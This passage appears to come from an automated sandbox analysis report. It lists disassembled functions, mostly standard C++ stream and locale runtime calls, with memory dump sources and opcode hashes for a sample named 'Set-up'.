                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2BBBE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: 7abe474442cb09066b229761916ae86317e429052173de914943fead4a20a050
                                                                                              • Instruction ID: 69c79fa8bde4ec9c20e7d49a3be1d338065b4ea607e52f3b9de8756de43c4fb4
                                                                                              • Opcode Fuzzy Hash: 7abe474442cb09066b229761916ae86317e429052173de914943fead4a20a050
                                                                                              • Instruction Fuzzy Hash: 5E21AC71A15208AFCB05CFE8C991EDDBBB5AF18308F24409DE142B7281EB799F44DB60
                                                                                              Function 6BC2EA01 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2EA08
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2EA27
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2EA45
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2EAA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefG@std@@@std@@GetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@U?$char_traits@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 587729422-0
                                                                                              • Opcode ID: 4502116a8a8c43954a1b7379ab689623d5cfcfb1a42d313112f694cc5c8c16f6
                                                                                              • Instruction ID: 3993ef700804abefff7a16b937bfeb2b45d1eadd78b21c76b0ae0a75333590ac
                                                                                              • Opcode Fuzzy Hash: 4502116a8a8c43954a1b7379ab689623d5cfcfb1a42d313112f694cc5c8c16f6
                                                                                              • Instruction Fuzzy Hash: 4B21AC71A11108EFCB04CFA8C981FEDBBB9AF18308F244059E142B7281EB399F44DB60
                                                                                              Function 6BC2BA0F Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2BA16
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2BA35
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2BA53
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2BAB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: a14e7ae4b43c4e56ff106a48e41545615a178934f78f61ab8a9972e4abe6aef0
                                                                                              • Instruction ID: 5da3b052d710b316efa34dd12594d0837d2264d510e3950d228e76c133daa020
                                                                                              • Opcode Fuzzy Hash: a14e7ae4b43c4e56ff106a48e41545615a178934f78f61ab8a9972e4abe6aef0
                                                                                              • Instruction Fuzzy Hash: 5D21AC71A11108AFCB04CFE8C991EEDBBB5AF18308F244059E142B7281EB799F44DB60
                                                                                              Function 6BC2C9C9 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2C9D0
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2C9EF
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2CA0D
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2CA71
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: a2c8d80e6896063ac62ad9780d8a882e57f37f3a38e366d5787fdf95727478ea
                                                                                              • Instruction ID: 9dbb84b37dcd6b2bc042765bc3e347e05025856482b53763ddc96902857e71a6
                                                                                              • Opcode Fuzzy Hash: a2c8d80e6896063ac62ad9780d8a882e57f37f3a38e366d5787fdf95727478ea
                                                                                              • Instruction Fuzzy Hash: F5217C71A15108EFCB05CFA8C991EDDFBB5AF58308F244059E542B7291EB799F04DB60
                                                                                              Function 6BC2B908 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2B90F
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2B92E
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2B94C
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2B9B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: 899e4cdf15bd463c8e252ca6723355cd39503ced5abbb8ff11dc72ed6e0f1595
                                                                                              • Instruction ID: 03ed49921cd7aa05ba9301b0e04c1fee91fd54a338e5c2940a201f172a7db798
                                                                                              • Opcode Fuzzy Hash: 899e4cdf15bd463c8e252ca6723355cd39503ced5abbb8ff11dc72ed6e0f1595
                                                                                              • Instruction Fuzzy Hash: 8121AC71A11108AFCB04CFA8C991EEDBBB5AF18308F244059E142B7281EB799F44DB60
                                                                                              Function 6BC2E8FA Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2E901
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2E920
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2E93E
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2E9A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefG@std@@@std@@GetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@U?$char_traits@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 587729422-0
                                                                                              • Opcode ID: c0e79ac650ed021955c05938fb4802e31062ef965287b8e635685bddd48fa8ea
                                                                                              • Instruction ID: 5836242f5a4ec5a710d436a5e64f5619e79a634011d04692e11cb29262c5b153
                                                                                              • Opcode Fuzzy Hash: c0e79ac650ed021955c05938fb4802e31062ef965287b8e635685bddd48fa8ea
                                                                                              • Instruction Fuzzy Hash: 2321AC71A11108AFCB04CFA8C981FEDFBB9AF18308F244059E142B7281EB399F04DB60
                                                                                              Function 6BC2B801 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2B808
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2B827
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2B845
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2B8A9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: afdfb8e9bec27d02885e900c124487cd3ac1c48d5478df24732a9f12d56ef277
                                                                                              • Instruction ID: 32a6a840f5d5dca3b497e28a447a6dbd37dd6a0a2038229029858df65177a370
                                                                                              • Opcode Fuzzy Hash: afdfb8e9bec27d02885e900c124487cd3ac1c48d5478df24732a9f12d56ef277
                                                                                              • Instruction Fuzzy Hash: 3F21A971A11108AFCB04CFA8C991EEDFBB9AF18308F244059E142B7291EB799F44DB60
                                                                                              Function 6BC2EF24 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2EF2B
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2EF4A
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
